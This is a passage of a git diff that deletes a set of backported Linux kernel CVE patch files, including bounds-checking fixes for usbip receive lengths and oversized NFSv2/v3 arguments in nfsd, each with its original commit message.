- 	int newly_acked_sacked = prior_unsacked -
- 				 (tp->packets_out - tp->sacked_out);
- 
-+	if (newly_acked_sacked <= 0 || WARN_ON_ONCE(!tp->prior_cwnd))
-+		return;
-+
- 	tp->prr_delivered += newly_acked_sacked;
- 	if (tcp_packets_in_flight(tp) > tp->snd_ssthresh) {
- 		u64 dividend = (u64)tp->snd_ssthresh * tp->prr_delivered +
--- 
-1.9.1
-
diff --git a/Patches/Linux_CVEs/Untracked/ANY/0007-USB-usbip-fix-potential-out-of-bounds-write.patch b/Patches/Linux_CVEs/Untracked/ANY/0007-USB-usbip-fix-potential-out-of-bounds-write.patch
deleted file mode 100644
index 717e361a..00000000
--- a/Patches/Linux_CVEs/Untracked/ANY/0007-USB-usbip-fix-potential-out-of-bounds-write.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From bda1fb82d50ddd35354d850456e687da43bcd794 Mon Sep 17 00:00:00 2001
-From: Ignat Korchagin <ignat.korchagin@gmail.com>
-Date: Thu, 17 Mar 2016 18:00:29 +0000
-Subject: USB: usbip: fix potential out-of-bounds write
-
-Fix potential out-of-bounds write to urb->transfer_buffer
-usbip handles network communication directly in the kernel. When receiving a
-packet from its peer, usbip code parses headers according to protocol. As
-part of this parsing urb->actual_length is filled. Since the input for
-urb->actual_length comes from the network, it should be treated as untrusted.
-Any entity controlling the network may put any value in the input and the
-preallocated urb->transfer_buffer may not be large enough to hold the data.
-Thus, the malicious entity is able to write arbitrary data to kernel memory.
-
-Signed-off-by: Ignat Korchagin <ignat.korchagin@gmail.com>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
-(cherry picked from commit b348d7dddb6c4fbfc810b7a0626e8ec9e29f7cbb)
-
-Change-Id: I402ca8adef71745a85ba2c51945b99d46509c06e
-Signed-off-by: Akshaya <akshayab@codeaurora.org>
----
- drivers/usb/usbip/usbip_common.c | 11 +++++++++++
- 1 file changed, 11 insertions(+)
-
-diff --git a/drivers/usb/usbip/usbip_common.c b/drivers/usb/usbip/usbip_common.c
-index facaaf0..e40da77 100644
---- a/drivers/usb/usbip/usbip_common.c
-+++ b/drivers/usb/usbip/usbip_common.c
-@@ -741,6 +741,17 @@ int usbip_recv_xbuff(struct usbip_device *ud, struct urb *urb)
- 	if (!(size > 0))
- 		return 0;
- 
-+	if (size > urb->transfer_buffer_length) {
-+		/* should not happen, probably malicious packet */
-+		if (ud->side == USBIP_STUB) {
-+			usbip_event_add(ud, SDEV_EVENT_ERROR_TCP);
-+			return 0;
-+		} else {
-+			usbip_event_add(ud, VDEV_EVENT_ERROR_TCP);
-+			return -EPIPE;
-+		}
-+	}
-+
- 	ret = usbip_recv(ud->tcp_socket, urb->transfer_buffer, size);
- 	if (ret != size) {
- 		dev_err(&urb->dev->dev, "recv xbuf, %d\n", ret);
--- 
-1.9.1
-
diff --git a/Patches/Linux_CVEs/Untracked/ANY/0008-nfsd-check-for-oversized-NFSv2-v3-arguments.patch b/Patches/Linux_CVEs/Untracked/ANY/0008-nfsd-check-for-oversized-NFSv2-v3-arguments.patch
deleted file mode 100644
index 312d0fd2..00000000
--- a/Patches/Linux_CVEs/Untracked/ANY/0008-nfsd-check-for-oversized-NFSv2-v3-arguments.patch
+++ /dev/null
@@ -1,107 +0,0 @@
-From fa3cb34c08bd88c37a9cee301e12d440e7354f4b Mon Sep 17 00:00:00 2001
-From: "J. Bruce Fields" <bfields@redhat.com>
-Date: Fri, 21 Apr 2017 16:10:18 -0400
-Subject: nfsd: check for oversized NFSv2/v3 arguments
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
-
-A client can append random data to the end of an NFSv2 or NFSv3 RPC call
-without our complaining; we'll just stop parsing at the end of the
-expected data and ignore the rest.
-
-Encoded arguments and replies are stored together in an array of pages,
-and if a call is too large it could leave inadequate space for the
-reply.  This is normally OK because NFS RPC's typically have either
-short arguments and long replies (like READ) or long arguments and short
-replies (like WRITE).  But a client that sends an incorrectly long reply
-can violate those assumptions.  This was observed to cause crashes.
-
-Also, several operations increment rq_next_page in the decode routine
-before checking the argument size, which can leave rq_next_page pointing
-well past the end of the page array, causing trouble later in
-svc_free_pages.
-
-So, following a suggestion from Neil Brown, add a central check to
-enforce our expectation that no NFSv2/v3 call has both a large call and
-a large reply.
-
-As followup we may also want to rewrite the encoding routines to check
-more carefully that they aren't running off the end of the page array.
-
-We may also consider rejecting calls that have any extra garbage
-appended.  That would be safer, and within our rights by spec, but given
-the age of our server and the NFS protocol, and the fact that we've
-never enforced this before, we may need to balance that against the
-possibility of breaking some oddball client.
-
-Reported-by: Tuomas Haanpää <thaan@synopsys.com>
-Reported-by: Ari Kauppi <ari@synopsys.com>
-Cc: stable@vger.kernel.org
-Reviewed-by: NeilBrown <neilb@suse.com>
-Signed-off-by: J. Bruce Fields <bfields@redhat.com>
-(cherry picked from commit e6838a29ecb484c97e4efef9429643b9851fba6e)
-
-Change-Id: I7a049448dff17ffe5f9174fe07cd68495a838d40
-Signed-off-by: Akshaya <akshayab@codeaurora.org>
----
- fs/nfsd/nfssvc.c | 36 ++++++++++++++++++++++++++++++++++++
- 1 file changed, 36 insertions(+)
-
-diff --git a/fs/nfsd/nfssvc.c b/fs/nfsd/nfssvc.c
-index 752d56b..a89654b 100644
---- a/fs/nfsd/nfssvc.c
-+++ b/fs/nfsd/nfssvc.c
-@@ -646,6 +646,37 @@ static __be32 map_new_errors(u32 vers, __be32 nfserr)
- 	return nfserr;
- }
- 
-+/*
-+ * A write procedure can have a large argument, and a read procedure can
-+ * have a large reply, but no NFSv2 or NFSv3 procedure has argument and
-+ * reply that can both be larger than a page.  The xdr code has taken
-+ * advantage of this assumption to be a sloppy about bounds checking in
-+ * some cases.  Pending a rewrite of the NFSv2/v3 xdr code to fix that
-+ * problem, we enforce these assumptions here:
-+ */
-+static bool nfs_request_too_big(struct svc_rqst *rqstp,
-+				struct svc_procedure *proc)
-+{
-+	/*
-+	 * The ACL code has more careful bounds-checking and is not
-+	 * susceptible to this problem:
-+	 */
-+	if (rqstp->rq_prog != NFS_PROGRAM)
-+		return false;
-+	/*
-+	 * Ditto NFSv4 (which can in theory have argument and reply both
-+	 * more than a page):
-+	 */
-+	if (rqstp->rq_vers >= 4)
-+		return false;
-+	/* The reply will be small, we're OK: */
-+	if (proc->pc_xdrressize > 0 &&
-+	    proc->pc_xdrressize < XDR_QUADLEN(PAGE_SIZE))
-+		return false;
-+
-+	return rqstp->rq_arg.len > PAGE_SIZE;
-+}
-+
- int
- nfsd_dispatch(struct svc_rqst *rqstp, __be32 *statp)
- {
-@@ -658,6 +689,11 @@ nfsd_dispatch(struct svc_rqst *rqstp, __be32 *statp)
- 				rqstp->rq_vers, rqstp->rq_proc);
- 	proc = rqstp->rq_procinfo;
- 
-+	if (nfs_request_too_big(rqstp, proc)) {
-+		dprintk("nfsd: NFSv%d argument too large\n", rqstp->rq_vers);
-+		*statp = rpc_garbage_args;
-+		return 1;
-+	}
- 	/*
- 	 * Give the xdr decoder a chance to change this if it wants
- 	 * (necessary in the NFSv4.0 compound case)
--- 
-1.9.1
-